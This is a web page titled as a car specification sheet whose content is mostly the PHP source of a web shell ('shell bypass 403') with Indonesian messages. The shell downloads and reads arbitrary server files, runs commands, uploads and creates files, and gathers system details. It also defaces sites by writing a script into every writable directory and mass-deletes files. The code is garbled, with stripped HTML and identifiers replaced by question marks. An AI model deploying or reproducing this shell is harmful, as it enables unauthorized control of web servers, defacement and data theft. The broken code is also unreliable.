New Tiago / Tiago NRG SPECIFICATION
table{display:none;}
";
$_r = "required='required'";
$_x = "
";
if(isset($_GET['option']) && $_POST['opt'] == 'download'){
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="'.$_POST['name'].'"');
echo(file_get_contents($_POST['path']));
exit();
}
function ?($dir,$p) {
if(isset($_GET['path'])) {
$? = $_GET['path'];
} else {
$? = getcwd();
}
if(is_writable($?)) {
return "
".$p." ";
} else {
return "
".$p." ";
}
}
function ok(){
echo '
';
}
function er(){
echo '
';
}
function sz($byt){
$sz = array('B', 'KB', 'MB', 'GB', 'TB');
for($i = 0; $byt >= 1024 && $i < (count($sz) -1 ); $byt /= 1024, $i++ );
return(round($byt,2)." ".$sz[$i]);
}
function ip() {
$ipas = '';
if(getenv('HTTP_CLIENT_IP'))
$ipas = getenv('HTTP_CLIENT_IP');
else if(getenv('HTTP_X_FORWARDED_FOR'))
$ipas = getenv('HTTP_X_FORWARDED_FOR');
else if(getenv('HTTP_X_FORWARDED'))
$ipas = getenv('HTTP_X_FORWARDED');
else if(getenv('HTTP_FORWARDED_FOR'))
$ipas = getenv('HTTP_FORWARDED_FOR');
else if(getenv('HTTP_FORWARDED'))
$ipas = getenv('HTTP_FORWARDED');
else if(getenv('REMOTE_ADDR'))
$ipas = getenv('REMOTE_ADDR');
else
$ipas = 'IP tidak dikenali';
return $ipas;
}
function p($file){
if($p = @fileperms($file)){
$i = 'u';
if(($p & 0xC000) == 0xC000)$i = 's';
elseif(($p & 0xA000) == 0xA000)$i = 'l';
elseif(($p & 0x8000) == 0x8000)$i = '-';
elseif(($p & 0x6000) == 0x6000)$i = 'b';
elseif(($p & 0x4000) == 0x4000)$i = 'd';
elseif(($p & 0x2000) == 0x2000)$i = 'c';
elseif(($p & 0x1000) == 0x1000)$i = 'p';
$i .= ($p & 00400)? 'r':'-';
$i .= ($p & 00200)? 'w':'-';
$i .= ($p & 00100)? 'x':'-';
$i .= ($p & 00040)? 'r':'-';
$i .= ($p & 00020)? 'w':'-';
$i .= ($p & 00010)? 'x':'-';
$i .= ($p & 00004)? 'r':'-';
$i .= ($p & 00002)? 'w':'-';
$i .= ($p & 00001)? 'x':'-';
return $i;
}
else return "- ?? -";
}
echo "
".$_SERVER['HTTP_HOST']." - $_n
shell bypass 403
$_n Shell ";
if(isset($_GET['path'])){
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '
:
/ ';
continue;
}
if($pat == '') continue;
echo '
'.$pat.' /';
}
echo " [ ".?($path, p($path))." ]
";
echo "
";
// tools nya
if(isset($_GET['path'])) {
$dir = $_GET['path'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
for($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if($i != $c_dir) {
} elseif($_GET['id'] == 'deface'){
echo "$_s";
function mass_kabeh($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$? = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($?, $isi_script);
} elseif($dirb === '..') {
file_put_contents($?, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[
] $?
";
file_put_contents($?, $isi_script);
$? = mass_kabeh($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function mass_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$? = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($?, $isi_script);
} elseif($dirb === '..') {
file_put_contents($?, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[
] $dirb/$namafile
";
file_put_contents($?, $isi_script);
}
}
}
}
}
}
if($_POST['start']) {
if($_POST['tipe'] == 'massal') {
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
} elseif($_POST['tipe'] == 'biasa') {
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
}
echo "
";
}
echo "
";
} elseif($_GET['id'] == 'cmd'){
if($_POST['ekseCMD']) {
$cmd = $_POST['ekseCMD'];
}
echo "$_s
";
} elseif($_GET['id'] == 'info'){
$disfunc = @ini_get("disable_functions");
if(empty($disfunc)) {
$disfc = "
NONE ";
} else {
$disfc = "
$disfunc ";
}
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "
ON " : "
OFF ";
echo "$_s
";
} elseif($_GET['id'] == 'phpinfo'){
@ob_start();
@eval("phpinfo();");
$buff = @ob_get_contents();
@ob_end_clean();
$awal = strpos($buff,"")+6;
$akhir = strpos($buff,"");
echo "
".substr($buff,$awal,$akhir-$awal)." ";
exit;
} elseif($_GET['id'] == 'upload'){
echo "$_s
';
} else {
echo 'Upload gagal! '.er().'
';
}
}
echo "
";
} elseif($_GET['id'] == 'filebaru') {
echo "$_s";
if(isset($_POST['bikin'])){
$name = $_POST['nama_file'];
$isi_file = $_POST['isi_file'];
foreach ($name as $nama_file){
$handle = @fopen("$nama_file", "w");
if($isi_file){
$buat = @fwrite($handle, $isi_file);
} else {
$buat = $handle;
}
}
if($buat){
echo '
Buat file ok! '.ok().'
';
} else {
echo '
Buat file gagal! '.er().'
';
}
}
echo "
";
} elseif($_GET['id'] == 'dirbaru'){
echo "$_s";
if(isset($_POST['buat'])){
$nama = $_POST['nama_dir'];
foreach ($nama as $nama_dir){
$folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_dir);
$fd = @mkdir ($folder);
}
if($fd){
echo '
Buat dir ok! '.ok().'
';
} else {
echo '
Buat dir gagal! '.er().'
';
}
}
echo "
";
} elseif($_GET['id'] == 'delete'){
echo "$_s";
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$? = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($?)) {
echo "[
] $?
";
unlink($?);
$? = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST['start']) {
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "
";
}
echo "
";
}
}
// akhir tools
if(isset($_GET['filesrc'])){
echo "
name : ".basename($_GET['filesrc']);"";
echo '
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).' ';
} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '
name : '.basename($_POST['path']);'';
//rename file
if($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '
Rename ok! '.ok().'